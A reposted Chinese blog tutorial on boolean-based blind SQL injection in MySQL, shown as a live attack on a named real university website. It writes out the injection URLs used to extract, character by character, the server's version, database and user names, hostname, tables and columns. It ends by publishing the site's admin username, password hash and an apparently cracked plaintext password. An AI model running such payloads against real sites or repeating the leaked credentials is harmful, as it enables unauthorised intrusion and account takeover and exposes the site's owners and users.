mysql 布尔型盲注_Mysql 高级盲注之布尔型盲注【sqli blind】

最新推荐文章于 2024-07-09 21:13:18 发布
最新推荐文章于 2024-07-09 21:13:18 发布
阅读量259 收藏
点赞数
文章标签: mysql 布尔型盲注
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36381298/article/details/113908089
版权

28b9f1c31d82b37711febabf5e418576.gif

什么是盲注 [sqli blind]?

盲注通常都是专门为了对付目标页面错误处理的比较好的这种情况,也就是说,有时即使目标存在注入,因为在页面上没有任何回显,此时再想利用常规的union曝数据字段可能就不大现实了,于是后来就被人发现了盲注这种技巧,关于盲注的常用类型,主要有三种,基于时间,布尔,错误[实际遇到的非常少]的盲注,不过我们今天暂时只针对布尔型盲注做详细说明,关于其它的技巧,后续还会再单独说明,其实,也算不上什么很高级的技巧,都是一些很基础的堆砌,废话不多说,最好的办法还是直接通过实战来透彻理解盲注

此次用于实战演示的布尔型盲注点,如下,页面正常情况下是这个样子的

https://www.vgu.ac.in/photo-gallery.php?id=1

9510f08c7a57497ef276e120cccfff94.png

还是先简单的判断下目标是否真的存在注入,当我尝试用 ‘\’干扰时,发现数据库已经报错了

https://www.vgu.ac.in/photo-gallery.php?id=1\

cf3421809fa31efe2b7af65c3160fbb8.png既然报错,就差不多说明,这已经是个注入点了,下面只需要想办法把它的sql语句成功闭合掉即可,也许在这里一眼看去,很可能以为它就是个普通的数字型注入点,其实,它是个字符型注入,这一点在实战中一定要注意,有时候发现数字闭合成功,要马上想到它也可能是个字符型的,因为这个数字到后端很可能是被当成一个字符串来处理的,如下,当我们条件为真时,页面返回正常

https://www.vgu.ac.in/photo-gallery.php?id=1' and 12=12 and 'sec'='sec

7b194213c73990bb405096175016254e.png

当我们的条件为假时,页面返回异常,这也说明我们的闭合没有问题,既然没有问题,我们就可以开始查各种数据了

https://www.vgu.ac.in/photo-gallery.php?id=1' and 12=121 and 'sec'='sec

eebdc25c7668fc1bde256be9f4e8ed96.png还是严格按照之前的流程,只不过这次查数据的方式,可能稍微不那么直观了

查询数据库版本,大家可能也看到了,盲注的本质,其实就是逐个字符的截取判断,像这种重复性的操作,如果纯手工来的话,估计得累死,还是老办法,我们直接拿burpsuite跑一下就好了,根据经验,像版本号一般都不会太长,20个足矣,常用的ascii码值,一般也都会在32-127之间,下面只是跑第一位字符,后面你还可以接着把第二位,第三位……字符都按同样的方法跑出来,像这些基础函数在前面都已经详细说明过了,实在不明白可以去看那个

https://www.vgu.ac.in/photo-gallery.php?id=1' and (select ascii(substring((select version()),1,1))=53) and 'sec'='sec

c7d7380dd7b55528c7290b0188cf636e.png

5c1674e62d74d5d6d701e4101dae452f.png

0358def9a4831f40ad6f9dc3a77706cc.png

我们发现,数字跑到53时抛出响应了异常,说明版本号第一位字符的ascii码值为53,其对应的字符为 ‘5’,篇幅原因,我就不一一的跑了,通过逐个位遍历,我们最终得到的完整版本号为 '5.5.57-cll'

2570dad7b0cd713146fa49fef27a887f.png

查询当前数据库名, 依然是一位位的截取遍历判断

https://www.vgu.ac.in/photo-gallery.php?id=1' and (select ascii(substring((select database()),1,1))=112) and 'sec'='sec

d46626731ab486af84f5f6cce622d54d.png

我们看到数据库名的第一个字符对应的ascii码值为118,其对应的字符为’v’,遍历后的最终结果为'vguac_web'

11345b744b48141cb368c484551befa0.png

查询当前数据库用户名

https://www.vgu.ac.in/photo-gallery.php?id=1' and (select ascii(substring((select user()),1,1))=112) and 'sec'='sec

45f77fa8b17076686793a91b919e1a2b.png

通过逐个位遍历,最终得到的数据库用户名为 'vguac_webuser@localhost'

65188dc61cf72bee580f1a572f17e931.png

查询目标系统平台,遍历可知,目标系统平台为 'Linux'

https://www.vgu.ac.in/photo-gallery.php?id=1' and (select ascii(substring((select @@compile_version_os),1,1))=112) and 'sec'='sec

01a3bfb2f188a3f3ffeb366b52bf1e13.png

c5e7d9e4e91a39df3893e4e2bfbc6531.png

查询数据存放目录,其最终结果为 '/var/lib/mysql/'

b8886331bca1a6bc1c1e4878bab025cf.png

查询Mysql安装目录, 其最终结果为 '/usr'

409d7fe3e4edfe044c5c794782e23d6f.png

查询当前机器的机器名,最终结果为,'dw1.dnsystemz.com',从这个机器名来看,看样子是个虚拟机

78a51989572ef5c07fe4f734f71f42a5.png

查出所有数据库名,没啥好说的,还是逐个字符进行遍历出所有的库名,最终查出所有的库名分别为

'information_schema','vguac_web'

5e3ed43fb18326bdcd1f7633c618c368.png

从'vguac_web'库中,找到管理表,通过遍历出所有的表名,我们发现了'login_user'疑似为其管理表

39beb3cc5c99fdfffa83820550582ded.png

读出'login_user'表中的所有字段名,最终,依旧是通过遍历,我们得到有效的账号密码字段分别为

'username','password'

501575a89bdf6c712841babe067b3975.png

有了账号密码字段名,下一步直接去遍历出字段下的所有数据即可,如下

https://www.vgu.ac.in/photo-gallery.php?id=1' and (select ascii(substring((select username from login_user limit 0,1),1,1))=65) and 'sec'='sec

6ceaec29de8f2e3a2192578aaf3b4e92.png

https://www.vgu.ac.in/photo-gallery.php?id=1' and (select ascii(substring((select password from login_user limit 0,1),1,1))=65) and 'sec'='sec

62e7ab0a9ea59fbb8822b97d9739e291.png

最终,我们得到的完整的目标网站管理员账号和密码hash 如下,至此,基于常规布尔型的纯手工盲注就差不多可以结束了,后台我就不找了,重要的还是大家真正的理解,拿不拿shell暂时无关紧要:

admin | 5fec4ba8376f207d1ff2f0cac0882b01 [admin!@#]

往期精彩

4293a3236c4fc958eefd29b0b4bc3b19.png

感兴趣的可以点个关注!!!

关注「安全先师」

把握前沿安全脉搏

如椽巨笔
关注
mysql数据库的布尔盲注_mysql注入-布尔盲注总结
weixin_28956075的博客
02-05 596
mysql布尔盲注总结布尔盲注常用函数:length()字符串长度判断left(a,b)从左侧截取a的前b位substr(a,b,c)从b位置开始,截取字符串a的c长度。ascii()将某个字符转换成相应的ascii码值。mid(a,b,c)从位置b开始,截取a字符串的c位ord函数与ascii()函数类似,将某个字符转换成相应的ascii码值。regrexp正则注入limit使用方法:limi...
sqli-labs Less-8 Blind-- Boolian Based基于布尔盲注
bigblue00的博客
06-16 424
Less-8 Blind-- Boolian Based基于布尔盲注 1、回显分析 当输入的语句正确时,显示 You are in… 当输入的语句异常时,不显示任何信息 2、SQL盲注 根据页面的显示情况会有不同,可以构造判断语句,当语句成立时,显示You are in… 当语句不成立时,不显示任何信息。 先判断数据库名的长度: http://192.168.195.110/sqli-labs/Less-8/?id=1’and (length(database())>10) – + 页面无信息显示,
SQL注入之基于布尔盲注详解
09-10
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔盲注。下面来一起看看吧。
MySQL布尔盲注
fdhdgsdfdsa的博客
03-11 263
盲注是注入的一种方式,是在页面只返回true和false时使用。 需要准备PHP知识 Length()函数 返回字符串的长度 Substr()截取字符串 Ascii()返回字符的ascii码 sleep(n):将程序挂起一段时间 n为n秒 if(expr1,expr2,expr3):判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句 以上每个函数都可使用,但有可能被禁用,可选其他函数测试 一、判断是否存在盲注 可能需要闭合及注释操作,此处未演示 03.php?id=1 and 1=1
MySQL布尔盲注
一个普普通通的博客
03-01 1578
Mysql注入—布尔盲注
MySQL数据库之布尔、枚举类和集合类的应用场景详解
Sparkjin的专栏
03-22 2711
【导读】 MySQL数据库四种数据类布尔、微整、枚举类和集合类,都逐一分析这四种数据类的特性,以及针对每种数据类做相应的深入分析和案例测试,挖掘出MySQL手册没有详细写清楚的部分,相关技术文章可以考虑从数据类系列第一篇文章MySQL数据库数据类之ENUM、SET、BOOL/BOOLEAN、TINYINT特性介绍开始阅读。 本文内容属于基于在此之前分享的6篇关于四
基于dvwa的sql盲注(Blind)-低中高
滕财然的博客
11-15 2913
目录sql盲注sql注入的区别sql盲注过程dvwa-SQL Injection (Blind) low级别布尔盲注时间盲注dvwa-SQL Injection (Blind) Medium级别dvwa-SQL Injection (Blind) High级别 sql盲注sql注入的区别 盲注:目标只会回复是或不是,没有详细内容 注入:可以查看到详细内容 盲注分为:布尔盲注、时间盲注...
SQL注入原理及实践(一)–SQL注入之布尔盲注
dulirongdudu的博客
08-02 2195
当不知道数据库返回值的情况下时【无回显】,输入1’and‘1’='1和1’and‘1’='2显示不一样,仅返回正确、或者错误的页面时,存在布尔盲注入。①if()if(条件,结果1,结果2)如果条件成立,则输出结果1,否则输出结果2。if(SUBSTRING(参数1,参数2,参数3),结果1.结果2)②字符串截取函数SUBSTRING(参数1,参数2,参数3)当假设长度为4时,返回正确的界面,因此数据库名为4位字符串。1’and‘1’='1为真返回正确的界面。.....................
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
2. 在布尔盲注中,攻击者发送一系列请求,每个请求都会改变SQL查询的条件,然后根据系统响应的不同(如页面加载速度的差异)来推断信息。例如,通过判断数据库是否包含特定字符或者某个字段的值是否为真,可以逐步...
sqli-labs学习笔记(三)less 7-10 导出文件和盲注
闵行小鱼塘
09-05 561
继续学习sqli-labs,本篇是less7-10
MySQL手注之布尔盲注详解
最新发布
m0_52484587的博客
07-09 346
说明存在注入,而且是字符的注入!(如果是数字的注入,那么就不用去闭合单引号)但是可以通过构造逻辑判断(比较大小)来得到我们需要的信息。这时,我们无法根据应用程序的返回页面得到我们需要的。基于布尔SQL盲注即在SQL注入过程中,应用程序仅仅返回。说明当前数据库名长度为。
SQL盲注布尔盲注
Dug123456_的博客
04-07 1699
flag有固定的格式,以右花括号结束,假设flag有小写英文字母、下划线、花括号构成,由于不知道flag长度,要一个无限循环,定义计数符j,内嵌循环i遍历小写、下划线和花括号,匹配到字符后j++,出循环的条件是当前i是右花括号,即flag结束。再大循环i次(遍历所有表),内嵌循环j次(表名的所有字符),i是表下标-1,j是字符下标,再内嵌循环k从a到z(假设表名全是小写英文字符)尝试获取每个表的表名。1 and length(database())=4 //判断数据库名字的长度是否为4。
mysql高级盲注技巧
weixin_34370347的博客
01-23 131
1.SQL Injection (classic or error based or whatever you call it) :D... 2.Blind SQL Injection (the harder part) So let's start with some action :D 1). Check for vulnerability Let's say t...
sql注入知识---布尔盲注
尘玥的故事
04-08 652
一般的情况下我们面对这种盲注都是写脚本跑(提前准备然后更具具体的情况再改脚本)表现:会对你的输出进行显示正确错误,但不会报错。通过返回的正确与否来判断数据库的每个字母。
MySQL手工布尔盲注
L_KevinK的博客
08-03 573
MySQL手工布尔盲注(1)测试注入点(2)爆数据库相关信息 (1)测试注入点 1)链接后加 ’ 号页面报错,爆出错误信息 2)链接后加 ’ and 1=1–+ 返回页面正常 3)链接后加 ’ and 1=2–+ 返回页面错误 (2)爆数据库相关信息 1)使用 order by 语句爆出表字段数为8 2)使用 union select 发现语句报错,此时不能使用联合查询语句,于是想到了布尔...
mysql 布尔
qq_33240556的博客
05-06 2584
如上所示,使用。
布尔盲注
m0_56107268的博客
12-04 827
布尔盲注常用的函数 length() 返回字符串的长度 substr() 截取字符串 substr(a,b,c) 第一个是截取的字符串 ,第二个是截取的位置 ,第三个是截取的长度 ascii() 返回字符串的ASCII码 limit a,b 第一个字符代表查询内容的位置,第二个代表长度 布尔盲注原理: 通过网页的回显来判断读错,可以利用and < > = 来进行判断 sql语句: SELECT * FROM users WHERE id='$id' LIMIT 0,1 爆数据库 (...
SQL注入实验室操作指南:布尔盲注技术详解
sqli-lab是一个在线实验室,它为学习者提供了多个不同级别的SQL注入挑战,帮助他们了解和掌握SQL注入的各种类,包括错误基础、时间盲注布尔盲注以及基于报错的SQL注入等。 在描述中提到的“布尔盲注”是SQL...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值